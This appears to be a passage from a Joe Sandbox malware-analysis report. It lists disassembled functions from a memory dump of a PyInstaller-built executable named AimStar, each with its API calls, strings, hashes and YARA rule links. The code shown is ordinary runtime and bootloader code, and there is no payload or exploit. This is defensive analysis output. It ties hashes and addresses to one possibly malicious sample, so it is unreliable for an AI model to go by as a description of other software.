FlsSetValue.KERNEL32(?,?,?,00007FF710F54F81,?,?,?,?,00007FF710F5A4FA,?,?,?,?,00007FF710F571FF), ref: 00007FF710F5B3BB
FlsSetValue.KERNEL32(?,?,?,00007FF710F54F81,?,?,?,?,00007FF710F5A4FA,?,?,?,?,00007FF710F571FF), ref: 00007FF710F5B3CC
SetLastError.KERNEL32(?,?,?,00007FF710F54F81,?,?,?,?,00007FF710F5A4FA,?,?,?,?,00007FF710F571FF), ref: 00007FF710F5B3E7

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 6d8f3e74ebbb6b3e9df47af100808aa7e96d944c008937dd2b032c21f4d9a902
Instruction ID: 7b2d6a4d612f110421e969019983c97df14bb56d209800f702c30a659077b510
Opcode Fuzzy Hash: 6d8f3e74ebbb6b3e9df47af100808aa7e96d944c008937dd2b032c21f4d9a902
Instruction Fuzzy Hash: 36118C20A0CE4A82FA54B721565713DE2AA5F487B0FC44334E82E567C6DE2CB60DC721

Function 00007FF710F42910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF710F41B6A), ref: 00007FF710F4295E

Strings

[PYI-%d:ERROR] , xrefs: 00007FF710F42966
Error, xrefs: 00007FF710F42A0E
Error [ANSI Fallback], xrefs: 00007FF710F429FF
%s: %s, xrefs: 00007FF710F429E8

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: CurrentProcess
String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
API String ID: 2050909247-2962405886
Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction ID: af6b0c84cf4678254ca775d5ed28f62648ecb21beb9ffa9c9ff33da36e3e42b4
Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction Fuzzy Hash: 0F31B736B1CA8552E710B761A8426E6B298BF887E4F800131EE4D83755DF3CE54AC610

Function 00007FF710F42390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF710F423C8
DialogBoxIndirectParamW.USER32 ref: 00007FF710F4248E
DeleteObject.GDI32 ref: 00007FF710F424C1
DestroyIcon.USER32 ref: 00007FF710F424D3

Strings

Unhandled exception in script, xrefs: 00007FF710F423F8

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
Instruction ID: 3f0175d0238b3dbc5c8a090f14237fe98c94a6ffbeae6feca79db69f4f1761d8
Opcode Fuzzy Hash: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
Instruction Fuzzy Hash: F731733661DE8189EB60EF21E8562F9A3A4FF89794F840135EA4D47B55DF3CE148C720

Function 00007FF710F42B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF710F4918F,?,00007FF710F43C55), ref: 00007FF710F42BA0
MessageBoxW.USER32 ref: 00007FF710F42C2A

Strings

[PYI-%d:%ls] , xrefs: 00007FF710F42BA8
WARNING, xrefs: 00007FF710F42BAF
Warning, xrefs: 00007FF710F42C1D

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: CurrentMessageProcess
String ID: WARNING$Warning$[PYI-%d:%ls]
API String ID: 1672936522-3797743490
Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction ID: 172aa94df94bc69ce49b602b5742859e44903b844107bdb4e256ec977cf9f4b9
Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction Fuzzy Hash: C3219F7270CF4182E650EB14B8467AAB3A8FB88794F804136EE8D97755DE3CE249C750

Function 00007FF710F42710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF710F41B99), ref: 00007FF710F42760

Strings

Error, xrefs: 00007FF710F427DE
ERROR, xrefs: 00007FF710F4276F
Error [ANSI Fallback], xrefs: 00007FF710F427CF
[PYI-%d:%s] , xrefs: 00007FF710F42768

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: CurrentProcess
String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-1591803126
Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction ID: 3c69edb76c156c611ccee13237ee720f5e956f80c0562d24120d1e99a6fb098e
Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction Fuzzy Hash: 89217172A1CB8552E650AB50B8427E6A398BB88794F800131EE8C83759DF7CE289C750

Function 00007FF710F59AF8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF710F59B1D
GetProcAddress.KERNEL32 ref: 00007FF710F59B33
FreeLibrary.KERNEL32 ref: 00007FF710F59B5A

Strings

mscoree.dll, xrefs: 00007FF710F59B14
CorExitProcess, xrefs: 00007FF710F59B2C

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction ID: 72619413d11f2a896fe30922e25daf4f238b0360d91c34131b1b7604a7e68c2a
Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction Fuzzy Hash: 7BF04425B0DE0691FA14AB14E4567759328EF85771F940235D56D463E4DF2CF28CC320

Function 00007FF710F693D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF710F69400
_set_statfp.LIBCMT ref: 00007FF710F6941B
_set_statfp.LIBCMT ref: 00007FF710F69437
_set_statfp.LIBCMT ref: 00007FF710F69473

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: f4721a673b98db7797d5913a70fc1859a576ca3f134d3f79da407c4c856ce546
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: 1511917AE5CE1301FA54B124E4573F5A04CEF99374F848634EA7E063DACE2CB94AD224

Function 00007FF710F5B400 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF710F5A613,?,?,00000000,00007FF710F5A8AE,?,?,?,?,?,00007FF710F5A83A), ref: 00007FF710F5B41F
FlsSetValue.KERNEL32(?,?,?,00007FF710F5A613,?,?,00000000,00007FF710F5A8AE,?,?,?,?,?,00007FF710F5A83A), ref: 00007FF710F5B43E
FlsSetValue.KERNEL32(?,?,?,00007FF710F5A613,?,?,00000000,00007FF710F5A8AE,?,?,?,?,?,00007FF710F5A83A), ref: 00007FF710F5B466
FlsSetValue.KERNEL32(?,?,?,00007FF710F5A613,?,?,00000000,00007FF710F5A8AE,?,?,?,?,?,00007FF710F5A83A), ref: 00007FF710F5B477
FlsSetValue.KERNEL32(?,?,?,00007FF710F5A613,?,?,00000000,00007FF710F5A8AE,?,?,?,?,?,00007FF710F5A83A), ref: 00007FF710F5B488

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 3cf0457813ef902b4d16e29671bd05b92734aec0d3ae5f0b4a86182189680110
Instruction ID: cb56a1f8abd9fb011eb0640d0143788b324f4ab81b2fa80e5d6d664f2249befb
Opcode Fuzzy Hash: 3cf0457813ef902b4d16e29671bd05b92734aec0d3ae5f0b4a86182189680110
Instruction Fuzzy Hash: 72116A20A0CE0641FA68FB215653179E16A5F847B0FD88334E93E467D7DE2CB649C721

Function 00007FF710F5B294 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF710F5B2A5
FlsSetValue.KERNEL32 ref: 00007FF710F5B2C4
FlsSetValue.KERNEL32 ref: 00007FF710F5B2EC
FlsSetValue.KERNEL32 ref: 00007FF710F5B2FD
FlsSetValue.KERNEL32 ref: 00007FF710F5B30E

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 58ce09dd5263def6ec13d4cefdd98fc26a3f0444d111e578bd11d526dfe727f7
Instruction ID: a465283edfeb73a356b6bfc112ddec59a253b4987a0840e85d6d0cb3dee9598d
Opcode Fuzzy Hash: 58ce09dd5263def6ec13d4cefdd98fc26a3f0444d111e578bd11d526dfe727f7
Instruction Fuzzy Hash: 85110620A0CA0A41F959B721441717991694F49370FC84774E93E5A3C3DD2CB60DC732

Function 00007FF710F56010 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F5604C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F56176
_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F5622C

Strings

verbose, xrefs: 00007FF710F56020

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction ID: cf552a08f4a76e8837201d6e5e0f8f94e690cbd1a24550d90857e6695f15bee9
Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction Fuzzy Hash: 8391CF32A0CE4641FB60AE25E45237DB2B9AB49BA4FC44136DA69433D5DF3CF649C321

Function 00007FF710F5FC38 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F5FF17

Part of subcall function 00007FF710F57AAC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F57AC9

Strings

UTF-16LEUNICODE, xrefs: 00007FF710F5FEB5
ccs, xrefs: 00007FF710F5FE52
UTF-8, xrefs: 00007FF710F5FE96

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction ID: 464900c6e3015259887501c3b5b433c8ee56b0ee9584e896a8ad368fe9974a98
Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction Fuzzy Hash: 5081D432D0CA0386F7647E258107278BAB8AB11768FD58075DA0987799CB2DFB0DC361

Function 00007FF710F4D6B8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF710F4D6E3
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF710F4D77A
RtlUnwindEx.KERNEL32 ref: 00007FF710F4D7D4

Strings

csm, xrefs: 00007FF710F4D761

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction ID: 379511426e0802ca37d905f95375c66f50c94902af67ff3ace30cf609d056aae
Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction Fuzzy Hash: 8C51A032B1DA028AEB14BB15E045A39B399EB44BA8F904131DE4E87788DF7CF849C710

Function 00007FF710F4F2F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF710F4F320
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF710F4F408

Strings

csm, xrefs: 00007FF710F4F342
csm, xrefs: 00007FF710F4F45A

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction ID: d7b9e28e7a0e7b2975c61d2e3997b38a28892beba2a6ee702c2072cdadd8c5f3
Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction Fuzzy Hash: DC51B03290CA828AEB64AF21D049A79B7A8EB54BA4F984135DE4C87795CF3CF458C711

Function 00007FF710F4EF48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF710F4EFA7
_CallSETranslator.LIBVCRUNTIME ref: 00007FF710F4EFF3

Strings

MOC, xrefs: 00007FF710F4EFBB
RCC, xrefs: 00007FF710F4EFC3

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction ID: a49e2157a4be6dee654568926976af875951c6a0edfb77c0dfb56b29a5198339
Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction Fuzzy Hash: D861A13290CBC585D720AB15E441BAAB7A4FB847A8F444225EF9C43B95DF7CE198CB10

Function 00007FF710F47E10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF710F4352C,?,00000000,00007FF710F43F23), ref: 00007FF710F47F22

Strings

%s%c, xrefs: 00007FF710F47E94
%.*s, xrefs: 00007FF710F47EDB
\, xrefs: 00007FF710F47E87

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
Instruction ID: 18c38e9a56cf858a10be994ae8134691fda7f0acf0bd8851e5c1fdb8a95aab21
Opcode Fuzzy Hash: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
Instruction Fuzzy Hash: F931C73171DEC145EA21AB11A851BEAA358FB84BF4F841231EE6D837C9DE3CE649C710

Function 00007FF710F42810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF710F428EA

Strings

Error, xrefs: 00007FF710F428DD
[PYI-%d:%ls] , xrefs: 00007FF710F42868
ERROR, xrefs: 00007FF710F4286F

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: Message
String ID: ERROR$Error$[PYI-%d:%ls]
API String ID: 2030045667-255084403
Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction ID: b86ce9edf358cc3c53d4e31c833100a08ef38be6bc03ab033478483f9f9ff6e3
Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction Fuzzy Hash: 81219F72B1CF4182E650EB14B4467AAB3A8FB88794F800136EE8D97756DE3CE249C750

Function 00007FF710F5C610 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF710F5C68F
WriteFile.KERNEL32 ref: 00007FF710F5C957
WriteFile.KERNEL32 ref: 00007FF710F5C99D
GetLastError.KERNEL32 ref: 00007FF710F5CA53

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction ID: cb331a170d3f3e293194661f9bce03eb423522669a638f87ad7619fa3e66968b
Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
